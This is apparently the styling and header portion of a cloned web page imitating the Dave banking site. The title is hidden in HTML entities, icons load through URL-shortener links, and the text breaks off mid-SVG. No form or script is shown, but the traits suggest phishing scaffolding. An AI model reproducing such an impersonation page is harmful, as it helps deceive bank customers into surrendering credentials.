<!DOCTYPE html>
<html lang="en"><head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<meta charset="utf-8">
<title>&#68;&#97;&#118;&#101;&#32;&#45;&#32;&#66;&#97;&#110;&#107;&#105;&#110;&#103;&#32;&#102;&#111;&#114;&#32;&#72;&#117;&#109;&#97;&#110;&#115;</title>
<meta name="viewport" content="width=device-width,initial-scale=1">
<link rel="apple-touch-icon" sizes="180x180" href="https://s.id/WFMD">
<link rel="icon" type="image/png" sizes="32x32" href="https://s.id/-WFMV">
<link rel="icon" type="image/png" sizes="16x16" href="https://s.id/-WFMY">
<link rel="shortcut icon" href="https://s.id/WFN4">
<link href="files/2.css" rel="stylesheet">
<link href="files/main.css" rel="stylesheet">
<link rel="stylesheet" href="files/7f85a56ba4.css">

<style data-jss="" data-meta="MuiGrid">
.MuiGrid-container {
  width: 100%;
  display: flex;
  flex-wrap: wrap;
  box-sizing: border-box;
}
.MuiGrid-item {
  margin: 0;
  box-sizing: border-box;
}
.MuiGrid-zeroMinWidth {
  min-width: 0;
}
.MuiGrid-direction-xs-column {
  flex-direction: column;
}
.MuiGrid-direction-xs-column-reverse {
  flex-direction: column-reverse;
}
.MuiGrid-direction-xs-row-reverse {
  flex-direction: row-reverse;
}
.MuiGrid-wrap-xs-nowrap {
  flex-wrap: nowrap;
}
.MuiGrid-wrap-xs-wrap-reverse {
  flex-wrap: wrap-reverse;
}
.MuiGrid-align-items-xs-center {
  align-items: center;
}
.MuiGrid-align-items-xs-flex-start {
  align-items: flex-start;
}
.MuiGrid-align-items-xs-flex-end {
  align-items: flex-end;
}
.MuiGrid-align-items-xs-baseline {
  align-items: baseline;
}
.MuiGrid-align-content-xs-center {
  align-content: center;
}
.MuiGrid-align-content-xs-flex-start {
  align-content: flex-start;
}
.MuiGrid-align-content-xs-flex-end {
  align-content: flex-end;
}
.MuiGrid-align-content-xs-space-between {
  align-content: space-between;
}
.MuiGrid-align-content-xs-space-around {
  align-content: space-around;
}
.MuiGrid-justify-xs-center {
  justify-content: center;
}
.MuiGrid-justify-xs-flex-end {
  justify-content: flex-end;
}
.MuiGrid-justify-xs-space-between {
  justify-content: space-between;
}
.MuiGrid-justify-xs-space-around {
  justify-content: space-around;
}
.MuiGrid-justify-xs-space-evenly {
  justify-content: space-evenly;
}
.MuiGrid-spacing-xs-1 {
  width: calc(100% + 8px);
  margin: -4px;
}
.MuiGrid-spacing-xs-1 > .MuiGrid-item {
  padding: 4px;
}
.MuiGrid-spacing-xs-2 {
  width: calc(100% + 16px);
  margin: -8px;
}
.MuiGrid-spacing-xs-2 > .MuiGrid-item {
  padding: 8px;
}
.MuiGrid-spacing-xs-3 {
  width: calc(100% + 24px);
  margin: -12px;
}
.MuiGrid-spacing-xs-3 > .MuiGrid-item {
  padding: 12px;
}
.MuiGrid-spacing-xs-4 {
  width: calc(100% + 32px);
  margin: -16px;
}
.MuiGrid-spacing-xs-4 > .MuiGrid-item {
  padding: 16px;
}
.MuiGrid-spacing-xs-5 {
  width: calc(100% + 40px);
  margin: -20px;
}
.MuiGrid-spacing-xs-5 > .MuiGrid-item {
  padding: 20px;
}
.MuiGrid-spacing-xs-6 {
  width: calc(100% + 48px);
  margin: -24px;
}
.MuiGrid-spacing-xs-6 > .MuiGrid-item {
  padding: 24px;
}
.MuiGrid-spacing-xs-7 {
  width: calc(100% + 56px);
  margin: -28px;
}
.MuiGrid-spacing-xs-7 > .MuiGrid-item {
  padding: 28px;
}
.MuiGrid-spacing-xs-8 {
  width: calc(100% + 64px);
  margin: -32px;
}
.MuiGrid-spacing-xs-8 > .MuiGrid-item {
  padding: 32px;
}
.MuiGrid-spacing-xs-9 {
  width: calc(100% + 72px);
  margin: -36px;
}
.MuiGrid-spacing-xs-9 > .MuiGrid-item {
  padding: 36px;
}
.MuiGrid-spacing-xs-10 {
  width: calc(100% + 80px);
  margin: -40px;
}
.MuiGrid-spacing-xs-10 > .MuiGrid-item {
  padding: 40px;
}
.MuiGrid-grid-xs-auto {
  flex-grow: 0;
  max-width: none;
  flex-basis: auto;
}
.MuiGrid-grid-xs-true {
  flex-grow: 1;
  max-width: 100%;
  flex-basis: 0;
}
.MuiGrid-grid-xs-1 {
  flex-grow: 0;
  max-width: 8.333333%;
  flex-basis: 8.333333%;
}
.MuiGrid-grid-xs-2 {
  flex-grow: 0;
  max-width: 16.666667%;
  flex-basis: 16.666667%;
}
.MuiGrid-grid-xs-3 {
  flex-grow: 0;
  max-width: 25%;
  flex-basis: 25%;
}
.MuiGrid-grid-xs-4 {
  flex-grow: 0;
  max-width: 33.333333%;
  flex-basis: 33.333333%;
}
.MuiGrid-grid-xs-5 {
  flex-grow: 0;
  max-width: 41.666667%;
  flex-basis: 41.666667%;
}
.MuiGrid-grid-xs-6 {
  flex-grow: 0;
  max-width: 50%;
  flex-basis: 50%;
}
.MuiGrid-grid-xs-7 {
  flex-grow: 0;
  max-width: 58.333333%;
  flex-basis: 58.333333%;
}
.MuiGrid-grid-xs-8 {
  flex-grow: 0;
  max-width: 66.666667%;
  flex-basis: 66.666667%;
}
.MuiGrid-grid-xs-9 {
  flex-grow: 0;
  max-width: 75%;
  flex-basis: 75%;
}
.MuiGrid-grid-xs-10 {
  flex-grow: 0;
  max-width: 83.333333%;
  flex-basis: 83.333333%;
}
.MuiGrid-grid-xs-11 {
  flex-grow: 0;
  max-width: 91.666667%;
  flex-basis: 91.666667%;
}
.MuiGrid-grid-xs-12 {
  flex-grow: 0;
  max-width: 100%;
  flex-basis: 100%;
}
@media (min-width:600px) {
  .MuiGrid-grid-sm-auto {
    flex-grow: 0;
    max-width: none;
    flex-basis: auto;
  }
  .MuiGrid-grid-sm-true {
    flex-grow: 1;
    max-width: 100%;
    flex-basis: 0;
  }
  .MuiGrid-grid-sm-1 {
    flex-grow: 0;
    max-width: 8.333333%;
    flex-basis: 8.333333%;
  }
  .MuiGrid-grid-sm-2 {
    flex-grow: 0;
    max-width: 16.666667%;
    flex-basis: 16.666667%;
  }
  .MuiGrid-grid-sm-3 {
    flex-grow: 0;
    max-width: 25%;
    flex-basis: 25%;
  }
  .MuiGrid-grid-sm-4 {
    flex-grow: 0;
    max-width: 33.333333%;
    flex-basis: 33.333333%;
  }
  .MuiGrid-grid-sm-5 {
    flex-grow: 0;
    max-width: 41.666667%;
    flex-basis: 41.666667%;
  }
  .MuiGrid-grid-sm-6 {
    flex-grow: 0;
    max-width: 50%;
    flex-basis: 50%;
  }
  .MuiGrid-grid-sm-7 {
    flex-grow: 0;
    max-width: 58.333333%;
    flex-basis: 58.333333%;
  }
  .MuiGrid-grid-sm-8 {
    flex-grow: 0;
    max-width: 66.666667%;
    flex-basis: 66.666667%;
  }
  .MuiGrid-grid-sm-9 {
    flex-grow: 0;
    max-width: 75%;
    flex-basis: 75%;
  }
  .MuiGrid-grid-sm-10 {
    flex-grow: 0;
    max-width: 83.333333%;
    flex-basis: 83.333333%;
  }
  .MuiGrid-grid-sm-11 {
    flex-grow: 0;
    max-width: 91.666667%;
    flex-basis: 91.666667%;
  }
  .MuiGrid-grid-sm-12 {
    flex-grow: 0;
    max-width: 100%;
    flex-basis: 100%;
  }
}
@media (min-width:960px) {
  .MuiGrid-grid-md-auto {
    flex-grow: 0;
    max-width: none;
    flex-basis: auto;
  }
  .MuiGrid-grid-md-true {
    flex-grow: 1;
    max-width: 100%;
    flex-basis: 0;
  }
  .MuiGrid-grid-md-1 {
    flex-grow: 0;
    max-width: 8.333333%;
    flex-basis: 8.333333%;
  }
  .MuiGrid-grid-md-2 {
    flex-grow: 0;
    max-width: 16.666667%;
    flex-basis: 16.666667%;
  }
  .MuiGrid-grid-md-3 {
    flex-grow: 0;
    max-width: 25%;
    flex-basis: 25%;
  }
  .MuiGrid-grid-md-4 {
    flex-grow: 0;
    max-width: 33.333333%;
    flex-basis: 33.333333%;
  }
  .MuiGrid-grid-md-5 {
    flex-grow: 0;
    max-width: 41.666667%;
    flex-basis: 41.666667%;
  }
  .MuiGrid-grid-md-6 {
    flex-grow: 0;
    max-width: 50%;
    flex-basis: 50%;
  }
  .MuiGrid-grid-md-7 {
    flex-grow: 0;
    max-width: 58.333333%;
    flex-basis: 58.333333%;
  }
  .MuiGrid-grid-md-8 {
    flex-grow: 0;
    max-width: 66.666667%;
    flex-basis: 66.666667%;
  }
  .MuiGrid-grid-md-9 {
    flex-grow: 0;
    max-width: 75%;
    flex-basis: 75%;
  }
  .MuiGrid-grid-md-10 {
    flex-grow: 0;
    max-width: 83.333333%;
    flex-basis: 83.333333%;
  }
  .MuiGrid-grid-md-11 {
    flex-grow: 0;
    max-width: 91.666667%;
    flex-basis: 91.666667%;
  }
  .MuiGrid-grid-md-12 {
    flex-grow: 0;
    max-width: 100%;
    flex-basis: 100%;
  }
}
@media (min-width:1280px) {
  .MuiGrid-grid-lg-auto {
    flex-grow: 0;
    max-width: none;
    flex-basis: auto;
  }
  .MuiGrid-grid-lg-true {
    flex-grow: 1;
    max-width: 100%;
    flex-basis: 0;
  }
  .MuiGrid-grid-lg-1 {
    flex-grow: 0;
    max-width: 8.333333%;
    flex-basis: 8.333333%;
  }
  .MuiGrid-grid-lg-2 {
    flex-grow: 0;
    max-width: 16.666667%;
    flex-basis: 16.666667%;
  }
  .MuiGrid-grid-lg-3 {
    flex-grow: 0;
    max-width: 25%;
    flex-basis: 25%;
  }
  .MuiGrid-grid-lg-4 {
    flex-grow: 0;
    max-width: 33.333333%;
    flex-basis: 33.333333%;
  }
  .MuiGrid-grid-lg-5 {
    flex-grow: 0;
    max-width: 41.666667%;
    flex-basis: 41.666667%;
  }
  .MuiGrid-grid-lg-6 {
    flex-grow: 0;
    max-width: 50%;
    flex-basis: 50%;
  }
  .MuiGrid-grid-lg-7 {
    flex-grow: 0;
    max-width: 58.333333%;
    flex-basis: 58.333333%;
  }
  .MuiGrid-grid-lg-8 {
    flex-grow: 0;
    max-width: 66.666667%;
    flex-basis: 66.666667%;
  }
  .MuiGrid-grid-lg-9 {
    flex-grow: 0;
    max-width: 75%;
    flex-basis: 75%;
  }
  .MuiGrid-grid-lg-10 {
    flex-grow: 0;
    max-width: 83.333333%;
    flex-basis: 83.333333%;
  }
  .MuiGrid-grid-lg-11 {
    flex-grow: 0;
    max-width: 91.666667%;
    flex-basis: 91.666667%;
  }
  .MuiGrid-grid-lg-12 {
    flex-grow: 0;
    max-width: 100%;
    flex-basis: 100%;
  }
}
@media (min-width:1920px) {
  .MuiGrid-grid-xl-auto {
    flex-grow: 0;
    max-width: none;
    flex-basis: auto;
  }
  .MuiGrid-grid-xl-true {
    flex-grow: 1;
    max-width: 100%;
    flex-basis: 0;
  }
  .MuiGrid-grid-xl-1 {
    flex-grow: 0;
    max-width: 8.333333%;
    flex-basis: 8.333333%;
  }
  .MuiGrid-grid-xl-2 {
    flex-grow: 0;
    max-width: 16.666667%;
    flex-basis: 16.666667%;
  }
  .MuiGrid-grid-xl-3 {
    flex-grow: 0;
    max-width: 25%;
    flex-basis: 25%;
  }
  .MuiGrid-grid-xl-4 {
    flex-grow: 0;
    max-width: 33.333333%;
    flex-basis: 33.333333%;
  }
  .MuiGrid-grid-xl-5 {
    flex-grow: 0;
    max-width: 41.666667%;
    flex-basis: 41.666667%;
  }
  .MuiGrid-grid-xl-6 {
    flex-grow: 0;
    max-width: 50%;
    flex-basis: 50%;
  }
  .MuiGrid-grid-xl-7 {
    flex-grow: 0;
    max-width: 58.333333%;
    flex-basis: 58.333333%;
  }
  .MuiGrid-grid-xl-8 {
    flex-grow: 0;
    max-width: 66.666667%;
    flex-basis: 66.666667%;
  }
  .MuiGrid-grid-xl-9 {
    flex-grow: 0;
    max-width: 75%;
    flex-basis: 75%;
  }
  .MuiGrid-grid-xl-10 {
    flex-grow: 0;
    max-width: 83.333333%;
    flex-basis: 83.333333%;
  }
  .MuiGrid-grid-xl-11 {
    flex-grow: 0;
    max-width: 91.666667%;
    flex-basis: 91.666667%;
  }
  .MuiGrid-grid-xl-12 {
    flex-grow: 0;
    max-width: 100%;
    flex-basis: 100%;
  }
}
</style><style data-jss="" data-meta="MuiTypography">
.MuiTypography-root {
  margin: 0;
}
.MuiTypography-body2 {
  font-size: 12px;
  font-family: "Basis Grotesque", "Helvetica Neue", "Lucida Grande", Arial, sans-serif;
  font-weight: 400;
  line-height: 1.43;
}
.MuiTypography-body1 {
  font-size: 16px;
  font-family: "Basis Grotesque", "Helvetica Neue", "Lucida Grande", Arial, sans-serif;
  font-weight: 400;
  line-height: 1.5;
}
.MuiTypography-caption {
  font-size: 12px;
  font-family: "Basis Grotesque", "Helvetica Neue", "Lucida Grande", Arial, sans-serif;
  font-weight: 400;
  line-height: 1.66;
  letter-spacing: 0.125px;
}
.MuiTypography-caption b {
  letter-spacing: 0.25px;
}
.MuiTypography-button {
  font-size: 14px;
  font-family: "Basis Grotesque", "Helvetica Neue", "Lucida Grande", Arial, sans-serif;
  font-weight: 500;
  line-height: 18px;
  letter-spacing: 0.25px;
  text-transform: none;
}
.MuiTypography-h1 {
  font-size: 48px;
  font-family: "Larsseit", "Helvetica Neue", "Lucida Grande", Arial, sans-serif;
  font-weight: 300;
  line-height: 1.167;
  letter-spacing: -1.5px;
}
.MuiTypography-h2 {
  font-size: 36px;
  font-family: "Larsseit", "Helvetica Neue", "Lucida Grande", Arial, sans-serif;
  font-weight: 300;
  line-height: 1.2;
  letter-spacing: -0.5px;
}
.MuiTypography-h3 {
  font-size: 24px;
  font-family: "Larsseit", "Helvetica Neue", "Lucida Grande", Arial, sans-serif;
  font-weight: 400;
  line-height: 1.167;
  letter-spacing: 0px;
}
.MuiTypography-h4 {
  font-size: 20px;
  font-family: "Larsseit", "Helvetica Neue", "Lucida Grande", Arial, sans-serif;
  font-weight: 400;
  line-height: 1.235;
  letter-spacing: 0.25px;
}
.MuiTypography-h5 {
  font-size: 16px;
  font-family: "Larsseit", "Helvetica Neue", "Lucida Grande", Arial, sans-serif;
  font-weight: 400;
  line-height: 19px;
  letter-spacing: 0px;
}
.MuiTypography-h6 {
  font-size: 14px;
  font-family: "Larsseit", "Helvetica Neue", "Lucida Grande", Arial, sans-serif;
  font-weight: 500;
  line-height: 1.6;
  letter-spacing: 0.15px;
}
.MuiTypography-subtitle1 {
  font-size: 13px;
  font-family: "Basis Grotesque", "Helvetica Neue", "Lucida Grande", Arial, sans-serif;
  font-weight: 400;
  line-height: 20px;
  letter-spacing: 0.15px;
}
.MuiTypography-subtitle2 {
  font-size: 12px;
  font-family: "Basis Grotesque", "Helvetica Neue", "Lucida Grande", Arial, sans-serif;
  font-weight: 500;
  line-height: 18px;
  letter-spacing: 0px;
}
.MuiTypography-overline {
  font-size: 10px;
  font-family: "Basis Grotesque", "Helvetica Neue", "Lucida Grande", Arial, sans-serif;
  font-weight: 400;
  line-height: 2.66;
  letter-spacing: 0px;
  text-transform: capitalize;
}
.MuiTypography-srOnly {
  width: 1px;
  height: 1px;
  overflow: hidden;
  position: absolute;
}
.MuiTypography-alignLeft {
  text-align: left;
}
.MuiTypography-alignCenter {
  text-align: center;
}
.MuiTypography-alignRight {
  text-align: right;
}
.MuiTypography-alignJustify {
  text-align: justify;
}
.MuiTypography-noWrap {
  overflow: hidden;
  white-space: nowrap;
  text-overflow: ellipsis;
}
.MuiTypography-gutterBottom {
  margin-bottom: 0.35em;
}
.MuiTypography-paragraph {
  margin-bottom: 16px;
}
.MuiTypography-colorInherit {
  color: inherit;
}
.MuiTypography-colorPrimary {
  color: #326AC8;
}
.MuiTypography-colorSecondary {
  color: #0B9A40;
}
.MuiTypography-colorTextPrimary {
  color: #3C3C3C;
}
.MuiTypography-colorTextSecondary {
  color: #4D4D4D;
}
.MuiTypography-colorError {
  color: #FF5252;
}
.MuiTypography-displayInline {
  display: inline;
}
.MuiTypography-displayBlock {
  display: block;
}
</style><style data-jss="" data-meta="makeStyles">

</style><style data-jss="" data-meta="makeStyles">
</style><style data-jss="" data-meta="makeStyles">
</style><style data-jss="" data-meta="MuiLink">
.MuiLink-underlineNone {
  text-decoration: none;
}
.MuiLink-underlineHover {
  text-decoration: none;
}
.MuiLink-underlineHover:hover {
  text-decoration: underline;
}
.MuiLink-underlineAlways {
  text-decoration: underline;
}
.MuiLink-button {
  border: 0;
  cursor: pointer;
  margin: 0;
  outline: 0;
  padding: 0;
  position: relative;
  border-radius: 0;
  vertical-align: middle;
  -moz-appearance: none;
  -moz-user-select: none;
  background-color: transparent;
  -webkit-appearance: none;
  -webkit-tap-highlight-color: transparent;
}
.MuiLink-button::-moz-focus-inner {
  border-style: none;
}
.MuiLink-button.Mui-focusVisible {
  outline: auto;
}
</style><style data-jss="" data-meta="MuiButtonBase">
.MuiButtonBase-root {
  color: inherit;
  border: 0;
  cursor: pointer;
  margin: 0;
  display: inline-flex;
  outline: 0;
  padding: 0;
  position: relative;
  align-items: center;
  border-radius: 0;
  vertical-align: middle;
  -moz-appearance: none;
  justify-content: center;
  text-decoration: none;
  -moz-user-select: none;
  background-color: transparent;
  -webkit-appearance: none;
  -webkit-tap-highlight-color: transparent;
}
.MuiButtonBase-root::-moz-focus-inner {
  border-style: none;
}

@media print {
  .MuiButtonBase-root {
    color-adjust: exact;
  }
}
</style><style data-jss="" data-meta="MuiButton">
.MuiButton-root {
  color: #3C3C3C;
  padding: 16px 30px;
  font-size: 20px;
  min-width: 64px;
  box-sizing: border-box;
  transition: background-color 250ms cubic-bezier(0.4, 0, 0.2, 1) 0ms,box-shadow 250ms cubic-bezier(0.4, 0, 0.2, 1) 0ms,border 250ms cubic-bezier(0.4, 0, 0.2, 1) 0ms;
  font-family: "Larsseit", sans-serif;
  font-weight: bold;
  line-height: 24px;
  border-radius: 50px;
  letter-spacing: 0.25px;
  text-transform: none;
}
.MuiButton-root:hover {
  text-decoration: none;
  background-color: rgba(60, 60, 60, 0.04);
}

@media (hover: none) {
  .MuiButton-root:hover {
    background-color: transparent;
  }
}

.MuiButton-label {
  width: 100%;
  display: inherit;
  align-items: inherit;
  justify-content: inherit;
}
.MuiButton-text {
  padding: 6px 8px;
}
.MuiButton-textPrimary {
  color: #326AC8;
}
.MuiButton-textPrimary:hover {
  background-color: rgba(50, 106, 200, 0.04);
}
@media (hover: none) {
  .MuiButton-textPrimary:hover {
    background-color: transparent;
  }
}
.MuiButton-textSecondary {
  color: #0B9A40;
}
.MuiButton-textSecondary:hover {
  background-color: rgba(11, 154, 64, 0.04);
}
@media (hover: none) {
  .MuiButton-textSecondary:hover {
    background-color: transparent;
  }
}
.MuiButton-outlined {
  border: 1px solid rgba(0, 0, 0, 0.23);
  padding: 5px 15px;
}

.MuiButton-outlinedPrimary {
  color: #326AC8;
  border: 1px solid rgba(50, 106, 200, 0.5);
}
.MuiButton-outlinedPrimary:hover {
  border: 1px solid #326AC8;
  background-color: rgba(50, 106, 200, 0.04);
}
@media (hover: none) {
  .MuiButton-outlinedPrimary:hover {
    background-color: transparent;
  }
}
.MuiButton-outlinedSecondary {
  color: #0B9A40;
  border: 1px solid rgba(11, 154, 64, 0.5);
}
.MuiButton-outlinedSecondary:hover {
  border: 1px solid #0B9A40;
  background-color: rgba(11, 154, 64, 0.04);
}

@media (hover: none) {
  .MuiButton-outlinedSecondary:hover {
    background-color: transparent;
  }
}
.MuiButton-contained {
  color: #fff;
  box-shadow: none;
  background-color: #898989;
}
.MuiButton-contained:hover {
  box-shadow: 0px 2px 4px -1px rgba(0,0,0,0.2),0px 4px 5px 0px rgba(0,0,0,0.14),0px 1px 10px 0px rgba(0,0,0,0.12);
  background-color: #d5d5d5;
}
.MuiButton-contained.Mui-focusVisible {
  box-shadow: 0px 3px 5px -1px rgba(0,0,0,0.2),0px 6px 10px 0px rgba(0,0,0,0.14),0px 1px 18px 0px rgba(0,0,0,0.12);
}
.MuiButton-contained:active {
  box-shadow: 0px 5px 5px -3px rgba(0,0,0,0.2),0px 8px 10px 1px rgba(0,0,0,0.14),0px 3px 14px 2px rgba(0,0,0,0.12);
}

@media (hover: none) {
  .MuiButton-contained:hover {
    box-shadow: 0px 3px 1px -2px rgba(0,0,0,0.2),0px 2px 2px 0px rgba(0,0,0,0.14),0px 1px 5px 0px rgba(0,0,0,0.12);
    background-color: #898989;
  }
}

.MuiButton-containedPrimary {
  color: #fff;
  background-color: #326AC8;
}
.MuiButton-containedPrimary:hover {
  background-color: rgb(35, 74, 140);
}
@media (hover: none) {
  .MuiButton-containedPrimary:hover {
    background-color: #326AC8;
  }
}
.MuiButton-containedSecondary {
  color: #fff;
  background-color: #0B9A40;
}
.MuiButton-containedSecondary:hover {
  background-color: rgb(7, 107, 44);
}
@media (hover: none) {
  .MuiButton-containedSecondary:hover {
    background-color: #0B9A40;
  }
}

.MuiButton-colorInherit {
  color: inherit;
  border-color: currentColor;
}
.MuiButton-textSizeSmall {
  padding: 4px 5px;
  font-size: 0.8125rem;
}
.MuiButton-textSizeLarge {
  padding: 8px 11px;
  font-size: 0.9375rem;
}
.MuiButton-outlinedSizeSmall {
  padding: 3px 9px;
  font-size: 0.8125rem;
}
.MuiButton-outlinedSizeLarge {
  padding: 7px 21px;
  font-size: 0.9375rem;
}
.MuiButton-containedSizeSmall {
  padding: 4px 10px;
  font-size: 0.8125rem;
}
.MuiButton-containedSizeLarge {
  padding: 8px 22px;
  font-size: 0.9375rem;
}
.MuiButton-sizeLarge {
  padding: 15px 60px;
  font-size: 24px;
  line-height: 32px;
}
.MuiButton-fullWidth {
  width: 100%;
}
.MuiButton-startIcon {
  display: inherit;
  margin-left: -4px;
  margin-right: 8px;
}
.MuiButton-startIcon.MuiButton-iconSizeSmall {
  margin-left: -2px;
}
.MuiButton-endIcon {
  display: inherit;
  margin-left: 8px;
  margin-right: -4px;
}
.MuiButton-endIcon.MuiButton-iconSizeSmall {
  margin-right: -2px;
}
.MuiButton-iconSizeSmall > *:first-child {
  font-size: 18px;
}
.MuiButton-iconSizeMedium > *:first-child {
  font-size: 20px;
}
.MuiButton-iconSizeLarge > *:first-child {
  font-size: 22px;
}
</style><style data-jss="" data-meta="makeStyles">
.jss13 {
  margin-bottom: 32px;
}
@media (min-width:600px) {
  .jss13 {
    margin-bottom: 48px;
  }
}
.jss14 {
  font-size: 76px;
  text-align: center;
}
@media (max-width:1919.95px) {
  .jss14 {
    font-size: 62px;
  }
}
@media (max-width:1279.95px) {
  .jss14 {
    font-size: 56px;
  }
}
@media (max-width:959.95px) {
  .jss14 {
    font-size: 36px;
    letter-spacing: -1px;
  }
}
.jss15 {
  color: #0B9A40;
}
@media (max-width:959.95px) {
  .jss16 {
    max-width: 500px;
  }
}
.jss17 {
  width: 100%;
}
.jss18 {
  margin-top: 16px;
}
.jss19 {
  color: #3C3C3C;
  background-color: #F5F5F5;
}
</style><style data-jss="" data-meta="makeStyles">
</style><style data-jss="" data-meta="makeStyles">
.jss2 {
  width: 100%;
  max-width: 900px;
}
</style><style data-jss="" data-meta="makeStyles">
.jss24 {
  width: 100%;
}
.jss25 {
  margin-top: 40px;
  text-align: center;
}
.jss26 {
  font-weight: 600;
}
</style><style data-jss="" data-meta="makeStyles">
</style><style data-jss="" data-meta="makeStyles">
.jss1 {
  padding-bottom: 32px;
}
@media (min-width:768px) {
  .jss1 {
    width: 40vw;
  }
}
</style>
</head>
<body>


<div class="two-column_wrapper__3Sn8l">
<div class="two-column_left__2a2Sh" style="min-height: 643px;">
<div class="two-column_header__3KU4k">
<div class="two-column_logo__1wCkz">
<a href="" target="_blank" rel="noreferrer noopener">
<svg width="87" height="22" viewBox="0 0 87 22" fill="none" xmlns="https://s.id/WFNy" color="#3C3C3C"><path d="M34.9372 13.5174V12.9128C31.2088 11.8353 28.1481 12.213 28.1617 15.0147C28.1777 18.2552 34.9372 17.9981 34.9372 13.5174ZM69.7678 13.2495C70.0669 15.3967 72.4675 16.6969 74.3011 16.6969C75.9734 16.6969 77.0289 16.3834 78.1285 15.5976C79.0435 14.9438 80.2709 14.9188 81.196 15.5586C82.7175 16.6109 82.7003 18.8571 81.1532 19.8722C79.4591 20.984 76.9969 22 73.6548 22C67.8914 22 63.2051 17.0648 63.2051 10.9976C63.2051 4.93282 67.8914 0 73.6548 0C78.8174 0 83.2644 4.05011 83.997 9.4221C84.0041 9.47681 84.0112 9.55252 84.0182 9.64048C84.0807 10.5928 83.7465 11.5026 83.0784 12.1976C82.4082 12.8943 81.4523 13.2495 80.4808 13.2495H69.7678ZM77.5968 9.15646C77.5968 8.30459 76.9794 5.1488 73.5566 5.1488C71.5438 5.1488 69.763 7.03742 69.763 9.15646H77.5968ZM31.8891 0C34.4753 0 36.7286 0.680519 38.5863 2.02296C41.7018 4.2737 41.6554 7.7892 41.6379 9.1126C41.6368 9.19466 41.6357 9.26818 41.6357 9.33142V18.5764C41.6357 20.3672 40.1636 21.8241 38.3541 21.8241H38.2347C37.3587 21.8241 36.5349 21.4862 35.9147 20.8724C35.5817 20.5431 35.3288 20.1525 35.1663 19.7261C34.2354 20.6077 32.3576 22 29.0827 22C24.5154 22 21.5641 19.242 21.5641 14.9742C21.5641 11.4045 24.4972 8.82464 29.0364 8.40167C31.6315 8.16053 33.879 8.65593 34.9533 8.95943L34.9531 8.71085C34.9531 4.92599 30.4389 5.36209 27.0377 6.14042C23.0826 7.04873 21.8962 2.02646 25.2899 0.97789C26.7631 0.522752 28.8448 0 31.8891 0ZM3.38377 0H9.68018C15.723 0 20.7199 4.68848 20.8189 10.4519C20.8684 13.3278 19.7512 16.0401 17.6732 18.0889C15.5943 20.1381 12.8169 21.2667 9.85252 21.2667H3.38377C1.51797 21.2667 0 19.7952 0 17.9861V3.28052C0 1.47144 1.51797 0 3.38377 0ZM6.59204 16.3034H8.3845C12.2101 16.3034 14.2287 13.7647 14.2287 10.6333C14.2287 7.50179 12.2475 4.96353 8.3845 4.96353H6.59204V16.3034ZM52.7949 13.2526L56.7957 2.17875C57.2681 0.871326 58.5096 0 59.9004 0C62.3088 0 63.9062 2.49472 62.8981 4.68092L55.7946 20.0808C55.2549 21.2506 54.0837 22 52.7949 22C51.5059 22 50.3347 21.2506 49.7951 20.0808L42.6918 4.68092C41.6834 2.49472 43.2809 0 45.6894 0C47.08 0 48.3215 0.871326 48.7939 2.17875L52.7949 13.2526ZM87 2.2C87 2.81798 86.7869 3.33708 86.3546 3.76348C85.9222 4.18989 85.3896 4.4 84.7692 4.4C84.1426 4.4 83.6162 4.18989 83.1839 3.76348C82.7515 3.33708 82.5385 2.81798 82.5385 2.2C82.5385 1.58202 82.7515 1.06292 83.1839 0.636517C83.6162 0.210112 84.1426 0 84.7692 0C85.3896 0 85.9222 0.210112 86.3546 0.636517C86.7869 1.06292 87 1.58202 87 2.2ZM86.7055 2.2C86.7055 1.67472 86.5175 1.2236 86.1353 0.852809C85.7593 0.475843 85.3019 0.290449 84.7692 0.290449C84.2366 0.290449 83.7792 0.475843 83.4032 0.852809C83.021 1.2236 82.833 1.67472 82.833 2.2C82.833 2.72528 83.021 3.1764 83.4032 3.54719C83.7792 3.92416 84.2366 4.10955 84.7692 4.10955C85.3019 4.10955 85.7593 3.92416 86.1415 3.54719C86.5175 3.1764 86.7055 2.72528 86.7055 2.2ZM85.0825 2.37303L85.7781 3.47303H85.2956L84.6752 2.41629H84.3557V3.47303H83.9546V0.926966L84.8444 0.933146C85.07 0.933146 85.258 1.00112 85.4146 1.1309C85.5713 1.26067 85.6528 1.43989 85.6528 1.66854C85.6528 1.88483 85.5964 2.04551 85.4773 2.15674C85.3645 2.26798 85.2329 2.34213 85.0825 2.37303ZM85.2392 1.67472C85.2392 1.39663 85.0575 1.26067 84.7003 1.26067H84.3557V2.08876H84.7003C85.0575 2.08876 85.2392 1.95281 85.2392 1.67472Z" fill="currentColor"></path></svg></a></div><div class="two-column_bbbWrapper__v9UuP"><svg width="29" height="42" fill="#c0c0c0" viewBox="0 0 426.05 690.5" xmlns="http://www.w3.org/2000/svg" class="two-column_bbbLogo__23gWb"><path d="M159.36,79.56c-3.48,0-4.22-1.25-2.88-4.42,1.82-4.29,3.76-8.54,5.32-12.93A54.69,54.69,0,0,0,165,43.35a44.53,44.53,0,0,0-9.09-26.7c-4.66-6.29-10.48-11.36-16.68-16C130-6.33,120.13-12.25,110.23-18.07A259.81,259.81,0,0,1,79.49-39.44a161.64,161.64,0,0,1-15.7-13.9C60-57.24,56-60.88,52.44-64.93A121.43,121.43,0,0,1,37.78-85.41a77.07,77.07,0,0,1-9.08-24.45,67,67,0,0,1-.88-17.62c1.23-14.37,6.56-27.24,13.56-39.57s15.47-23.29,23.86-34.49c7.93-10.6,16.24-20.93,23.32-32.14,2.49-3.93,4.72-8,7-12.1,1.41-2.49,4.19-3.39,7.29-2.19,2.59,1,3.68,3.21,2.85,6a35.44,35.44,0,0,1-1.58,4.2c-2.3,5.32-4,10.79-3.61,16.67a12.55,12.55,0,0,0,.83,4.13,55.68,55.68,0,0,0,9.14,14.8c7.94,9.14,17.37,16.52,27.33,23.22,12.36,8.31,25,16.26,37.51,24.32A311.6,311.6,0,0,1,205.6-133a156.22,156.22,0,0,1,13.58,12.52A87.26,87.26,0,0,1,236.56-94.7a73.07,73.07,0,0,1,6,23.35c.26,3.48.52,7,.45,10.46a96.83,96.83,0,0,1-3.62,23.6,144.66,144.66,0,0,1-8.16,22c-6.95,15.22-16,29.18-25.73,42.73-8.47,11.77-17.65,23-27.06,34C174,66.53,169.7,71.69,165.29,76.8,163.71,78.64,161.74,79.81,159.36,79.56Z" transform="translate(116.46 248.5)"></path><path 